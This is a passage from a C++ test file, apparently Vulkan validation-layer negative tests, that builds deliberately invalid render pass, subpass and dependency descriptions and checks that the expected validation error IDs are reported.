0, nullptr, 2, subpasses, 0, nullptr}; // Not enough view masks TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkRenderPassCreateInfo-pNext-01928", "VUID-VkRenderPassCreateInfo2-viewMask-03058"); } TEST_F(VkLayerTest, RenderPassCreateInvalidInputAttachmentReferences) { TEST_DESCRIPTION("Create a subpass with the meta data aspect mask set for an input attachment"); ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MAINTENANCE2_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_MAINTENANCE2_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_KHR_MAINTENANCE2_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitState()); VkAttachmentDescription attach = {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL}; VkAttachmentReference ref = {0, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL}; VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 1, &ref, 0, nullptr, nullptr, nullptr, 0, nullptr}; VkInputAttachmentAspectReference iaar = {0, 0, VK_IMAGE_ASPECT_METADATA_BIT}; VkRenderPassInputAttachmentAspectCreateInfo rpiaaci = {VK_STRUCTURE_TYPE_RENDER_PASS_INPUT_ATTACHMENT_ASPECT_CREATE_INFO, nullptr, 1, &iaar}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpiaaci, 0, 1, &attach, 1, &subpass, 0, nullptr}; // Invalid meta data aspect m_errorMonitor->SetDesiredFailureMsg( VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkRenderPassCreateInfo-pNext-01963"); // Cannot/should not avoid getting this one too TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkInputAttachmentAspectReference-aspectMask-01964", nullptr); // Aspect not present iaar.aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassCreateInfo-pNext-01963", nullptr); // Invalid subpass index iaar.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; iaar.subpass = 1; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassCreateInfo-pNext-01926", nullptr); iaar.subpass = 0; // Invalid input attachment index iaar.inputAttachmentIndex = 1; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassCreateInfo-pNext-01927", nullptr); } TEST_F(VkLayerTest, RenderPassCreateInvalidFragmentDensityMapReferences) { TEST_DESCRIPTION("Create a subpass with the wrong attachment information for a fragment density map "); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_EXT_FRAGMENT_DENSITY_MAP_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_EXT_FRAGMENT_DENSITY_MAP_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_EXT_FRAGMENT_DENSITY_MAP_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_EXT_FRAGMENT_DENSITY_MAP_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitState()); VkAttachmentDescription attach = {0, VK_FORMAT_R8G8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_LOAD, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_FRAGMENT_DENSITY_MAP_OPTIMAL_EXT}; // Set 1 instead of 0 VkAttachmentReference ref = {1, VK_IMAGE_LAYOUT_FRAGMENT_DENSITY_MAP_OPTIMAL_EXT}; VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 1, &ref, 0, nullptr, nullptr, nullptr, 0, nullptr}; VkRenderPassFragmentDensityMapCreateInfoEXT rpfdmi = {VK_STRUCTURE_TYPE_RENDER_PASS_FRAGMENT_DENSITY_MAP_CREATE_INFO_EXT, nullptr, ref}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpfdmi, 0, 1, &attach, 1, &subpass, 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassFragmentDensityMapCreateInfoEXT-fragmentDensityMapAttachment-02547", nullptr); // Set wrong VkImageLayout ref = {0, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}; subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 1, &ref, 0, nullptr, nullptr, nullptr, 0, nullptr}; rpfdmi = {VK_STRUCTURE_TYPE_RENDER_PASS_FRAGMENT_DENSITY_MAP_CREATE_INFO_EXT, nullptr, ref}; rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpfdmi, 0, 1, &attach, 1, &subpass, 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassFragmentDensityMapCreateInfoEXT-fragmentDensityMapAttachment-02549", nullptr); // Set wrong load operation attach = {0, VK_FORMAT_R8G8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_CLEAR, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_FRAGMENT_DENSITY_MAP_OPTIMAL_EXT}; ref = {0, VK_IMAGE_LAYOUT_FRAGMENT_DENSITY_MAP_OPTIMAL_EXT}; subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 1, &ref, 0, nullptr, nullptr, nullptr, 0, nullptr}; rpfdmi = {VK_STRUCTURE_TYPE_RENDER_PASS_FRAGMENT_DENSITY_MAP_CREATE_INFO_EXT, nullptr, ref}; rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpfdmi, 0, 1, &attach, 1, &subpass, 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassFragmentDensityMapCreateInfoEXT-fragmentDensityMapAttachment-02550", nullptr); // Set wrong store operation attach = {0, VK_FORMAT_R8G8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_LOAD, VK_ATTACHMENT_STORE_OP_STORE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_FRAGMENT_DENSITY_MAP_OPTIMAL_EXT}; ref = {0, VK_IMAGE_LAYOUT_FRAGMENT_DENSITY_MAP_OPTIMAL_EXT}; subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 1, &ref, 0, nullptr, nullptr, nullptr, 0, nullptr}; rpfdmi = {VK_STRUCTURE_TYPE_RENDER_PASS_FRAGMENT_DENSITY_MAP_CREATE_INFO_EXT, nullptr, ref}; rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpfdmi, 0, 1, &attach, 1, &subpass, 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassFragmentDensityMapCreateInfoEXT-fragmentDensityMapAttachment-02551", nullptr); } TEST_F(VkLayerTest, RenderPassCreateSubpassNonGraphicsPipeline) { TEST_DESCRIPTION("Create a subpass with the compute pipeline bind point"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_COMPUTE, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}, }; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 0, nullptr, 1, subpasses, 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pipelineBindPoint-00844", "VUID-VkSubpassDescription2-pipelineBindPoint-03062"); } TEST_F(VkLayerTest, RenderPassCreateSubpassMissingAttributesBitMultiviewNVX) { TEST_DESCRIPTION("Create a subpass with the VK_SUBPASS_DESCRIPTION_PER_VIEW_ATTRIBUTES_BIT_NVX flag missing"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_NVX_MULTIVIEW_PER_VIEW_ATTRIBUTES_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_NVX_MULTIVIEW_PER_VIEW_ATTRIBUTES_EXTENSION_NAME) && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MULTIVIEW_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_NVX_MULTIVIEW_PER_VIEW_ATTRIBUTES_EXTENSION_NAME); m_device_extension_names.push_back(VK_KHR_MULTIVIEW_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_NVX_MULTIVIEW_PER_VIEW_ATTRIBUTES_EXTENSION_NAME); return; } bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); VkSubpassDescription subpasses[] = { {VK_SUBPASS_DESCRIPTION_PER_VIEW_POSITION_X_ONLY_BIT_NVX, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}, }; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 0, nullptr, 1, subpasses, 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-flags-00856", "VUID-VkSubpassDescription2-flags-03076"); } TEST_F(VkLayerTest, RenderPassCreate2SubpassInvalidInputAttachmentParameters) { TEST_DESCRIPTION("Create a subpass with parameters in the input attachment ref which are invalid"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_KHR_CREATE_RENDERPASS_2_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); if (!rp2Supported) { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_KHR_CREATE_RENDERPASS_2_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitState()); VkAttachmentDescription2KHR attach_desc = {}; attach_desc.sType = VK_STRUCTURE_TYPE_ATTACHMENT_DESCRIPTION_2_KHR; attach_desc.format = VK_FORMAT_UNDEFINED; attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; VkAttachmentReference2KHR reference = {}; reference.sType = VK_STRUCTURE_TYPE_ATTACHMENT_REFERENCE_2_KHR; reference.layout = VK_IMAGE_LAYOUT_GENERAL; reference.aspectMask = 0; VkSubpassDescription2KHR subpass = {VK_STRUCTURE_TYPE_SUBPASS_DESCRIPTION_2_KHR, nullptr, 0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, 1, &reference, 0, nullptr, nullptr, nullptr, 0, nullptr}; VkRenderPassCreateInfo2KHR rpci2 = { VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO_2_KHR, nullptr, 0, 1, &attach_desc, 1, &subpass, 0, nullptr, 0, nullptr}; // Test for aspect mask of 0 TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), &rpci2, "VUID-VkSubpassDescription2-attachment-02800"); // Test for invalid aspect mask bits reference.aspectMask = 0x40000000; // invalid VkImageAspectFlagBits value TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), &rpci2, "VUID-VkSubpassDescription2-attachment-02799"); } TEST_F(VkLayerTest, RenderPassCreateInvalidSubpassDependencies) { // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2_supported = CheckCreateRenderPass2Support(this, m_device_extension_names); bool multiviewSupported = rp2_supported; if (!rp2_supported && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MULTIVIEW_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_MULTIVIEW_EXTENSION_NAME); multiviewSupported = true; } // Add a device features struct enabling NO features VkPhysicalDeviceFeatures features = {0}; ASSERT_NO_FATAL_FAILURE(InitState(&features)); if (m_device->props.apiVersion >= VK_API_VERSION_1_1) { multiviewSupported = true; } // Create two dummy subpasses VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}, {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}, }; VkSubpassDependency dependency; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 0, nullptr, 2, subpasses, 1, &dependency}; // Non graphics stages in subpass dependency dependency = {0, 1, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT | VK_PIPELINE_STAGE_TRANSFER_BIT, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00837", "VUID-VkRenderPassCreateInfo2-pDependencies-03054"); dependency = {0, 1, VK_PIPELINE_STAGE_ALL_COMMANDS_BIT, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00837", "VUID-VkRenderPassCreateInfo2-pDependencies-03054"); dependency = {0, 1, VK_PIPELINE_STAGE_HOST_BIT, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00837", "VUID-VkRenderPassCreateInfo2-pDependencies-03054"); dependency = {0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_FRAGMENT_SHADER_BIT | VK_PIPELINE_STAGE_COMPUTE_SHADER_BIT}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00838", "VUID-VkRenderPassCreateInfo2-pDependencies-03055"); dependency = {0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_HOST_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00838", "VUID-VkRenderPassCreateInfo2-pDependencies-03055"); dependency = {0, VK_SUBPASS_EXTERNAL, VK_PIPELINE_STAGE_COMPUTE_SHADER_BIT, VK_PIPELINE_STAGE_COMPUTE_SHADER_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00837", "VUID-VkRenderPassCreateInfo2-pDependencies-03054"); dependency = {VK_SUBPASS_EXTERNAL, 0, VK_PIPELINE_STAGE_COMPUTE_SHADER_BIT, VK_PIPELINE_STAGE_COMPUTE_SHADER_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00838", "VUID-VkRenderPassCreateInfo2-pDependencies-03055"); dependency = {0, 0, VK_PIPELINE_STAGE_COMPUTE_SHADER_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00837", "VUID-VkRenderPassCreateInfo2-pDependencies-03054"); // Geometry shaders not enabled source dependency = {0, 1, VK_PIPELINE_STAGE_GEOMETRY_SHADER_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-srcStageMask-00860", "VUID-VkSubpassDependency2-srcStageMask-03080"); // Geometry shaders not enabled destination dependency = {0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_GEOMETRY_SHADER_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-dstStageMask-00861", "VUID-VkSubpassDependency2-dstStageMask-03081"); // Tessellation not enabled source dependency = {0, 1, VK_PIPELINE_STAGE_TESSELLATION_CONTROL_SHADER_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-srcStageMask-00862", "VUID-VkSubpassDependency2-srcStageMask-03082"); // Tessellation not enabled destination dependency = {0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_TESSELLATION_EVALUATION_SHADER_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-dstStageMask-00863", "VUID-VkSubpassDependency2-dstStageMask-03083"); // Potential cyclical dependency dependency = {1, 0, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-srcSubpass-00864", "VUID-VkSubpassDependency2-srcSubpass-03084"); // EXTERNAL to EXTERNAL dependency dependency = { VK_SUBPASS_EXTERNAL, VK_SUBPASS_EXTERNAL, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-srcSubpass-00865", "VUID-VkSubpassDependency2-srcSubpass-03085"); // Logically later source stages in self dependency dependency = {0, 0, VK_PIPELINE_STAGE_VERTEX_SHADER_BIT, VK_PIPELINE_STAGE_VERTEX_INPUT_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-srcSubpass-00867", "VUID-VkSubpassDependency2-srcSubpass-03087"); // Source access mask mismatch with source stage mask dependency = {0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, VK_ACCESS_UNIFORM_READ_BIT, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-srcAccessMask-00868", "VUID-VkSubpassDependency2-srcAccessMask-03088"); // Destination access mask mismatch with destination stage mask dependency = { 0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_FRAGMENT_SHADER_BIT, 0, VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-dstAccessMask-00869", "VUID-VkSubpassDependency2-dstAccessMask-03089"); if (multiviewSupported) { // VIEW_LOCAL_BIT but multiview is not enabled dependency = {0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, VK_DEPENDENCY_VIEW_LOCAL_BIT}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, nullptr, "VUID-VkRenderPassCreateInfo2-viewMask-03059"); // Enable multiview uint32_t pViewMasks[2] = {0x3u, 0x3u}; int32_t pViewOffsets[2] = {0, 0}; VkRenderPassMultiviewCreateInfo rpmvci = { VK_STRUCTURE_TYPE_RENDER_PASS_MULTIVIEW_CREATE_INFO, nullptr, 2, pViewMasks, 0, nullptr, 0, nullptr}; rpci.pNext = &rpmvci; // Excessive view offsets dependency = {0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, VK_DEPENDENCY_VIEW_LOCAL_BIT}; rpmvci.pViewOffsets = pViewOffsets; rpmvci.dependencyCount = 2; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassCreateInfo-pNext-01929", nullptr); rpmvci.dependencyCount = 0; // View offset with subpass self dependency dependency = {0, 0, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, VK_DEPENDENCY_VIEW_LOCAL_BIT}; rpmvci.pViewOffsets = pViewOffsets; pViewOffsets[0] = 1; rpmvci.dependencyCount = 1; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassCreateInfo-pNext-01930", nullptr); rpmvci.dependencyCount = 0; // View offset with no view local bit if (rp2_supported) { dependency = {0, VK_SUBPASS_EXTERNAL, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, 0}; rpmvci.pViewOffsets = pViewOffsets; pViewOffsets[0] = 1; rpmvci.dependencyCount = 1; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, nullptr, "VUID-VkSubpassDependency2-dependencyFlags-03092"); rpmvci.dependencyCount = 0; } // EXTERNAL subpass with VIEW_LOCAL_BIT - source subpass dependency = {VK_SUBPASS_EXTERNAL, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, VK_DEPENDENCY_VIEW_LOCAL_BIT}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-dependencyFlags-02520", "VUID-VkSubpassDependency2-dependencyFlags-03090"); // EXTERNAL subpass with VIEW_LOCAL_BIT - destination subpass dependency = {0, VK_SUBPASS_EXTERNAL, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, VK_DEPENDENCY_VIEW_LOCAL_BIT}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-dependencyFlags-02521", "VUID-VkSubpassDependency2-dependencyFlags-03091"); // Multiple views but no view local bit in self-dependency dependency = {0, 0, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-srcSubpass-00872", "VUID-VkRenderPassCreateInfo2-pDependencies-03060"); } } TEST_F(VkLayerTest, RenderPassCreateInvalidMixedAttachmentSamplesAMD) { TEST_DESCRIPTION("Verify error messages for supported and unsupported sample counts in render pass attachments."); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_AMD_MIXED_ATTACHMENT_SAMPLES_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_AMD_MIXED_ATTACHMENT_SAMPLES_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_AMD_MIXED_ATTACHMENT_SAMPLES_EXTENSION_NAME); return; } bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); std::vector<VkAttachmentDescription> attachments; { VkAttachmentDescription att = {}; att.format = VK_FORMAT_R8G8B8A8_UNORM; att.samples = VK_SAMPLE_COUNT_1_BIT; att.loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR; att.storeOp = VK_ATTACHMENT_STORE_OP_STORE; att.stencilLoadOp = VK_ATTACHMENT_LOAD_OP_DONT_CARE; att.stencilStoreOp = VK_ATTACHMENT_STORE_OP_DONT_CARE; att.initialLayout = VK_IMAGE_LAYOUT_UNDEFINED; att.finalLayout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL; attachments.push_back(att); att.format = VK_FORMAT_D16_UNORM; att.samples = VK_SAMPLE_COUNT_4_BIT; att.loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR; att.storeOp = VK_ATTACHMENT_STORE_OP_STORE; att.stencilLoadOp = VK_ATTACHMENT_LOAD_OP_CLEAR; att.stencilStoreOp = VK_ATTACHMENT_STORE_OP_STORE; att.initialLayout = VK_IMAGE_LAYOUT_UNDEFINED; att.finalLayout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL; attachments.push_back(att); } VkAttachmentReference color_ref = {}; color_ref.attachment = 0; color_ref.layout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL; VkAttachmentReference depth_ref = {}; depth_ref.attachment = 1; depth_ref.layout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL; VkSubpassDescription subpass = {}; subpass.pipelineBindPoint = VK_PIPELINE_BIND_POINT_GRAPHICS; subpass.colorAttachmentCount = 1; subpass.pColorAttachments = &color_ref; subpass.pDepthStencilAttachment = &depth_ref; VkRenderPassCreateInfo rpci = {}; rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; rpci.attachmentCount = attachments.size(); rpci.pAttachments = attachments.data(); rpci.subpassCount = 1; rpci.pSubpasses = &subpass; m_errorMonitor->ExpectSuccess(); VkRenderPass rp; VkResult err; err = vk::CreateRenderPass(device(), &rpci, NULL, &rp); m_errorMonitor->VerifyNotFound(); if (err == VK_SUCCESS) vk::DestroyRenderPass(m_device->device(), rp, nullptr); // Expect an error message for invalid sample counts attachments[0].samples = VK_SAMPLE_COUNT_4_BIT; attachments[1].samples = VK_SAMPLE_COUNT_1_BIT; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pColorAttachments-01506", "VUID-VkSubpassDescription2-pColorAttachments-03070"); } TEST_F(VkLayerTest, RenderPassBeginInvalidRenderArea) { TEST_DESCRIPTION("Generate INVALID_RENDER_AREA error by beginning renderpass with extent outside of framebuffer"); SetTargetApiVersion(VK_API_VERSION_1_2); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } 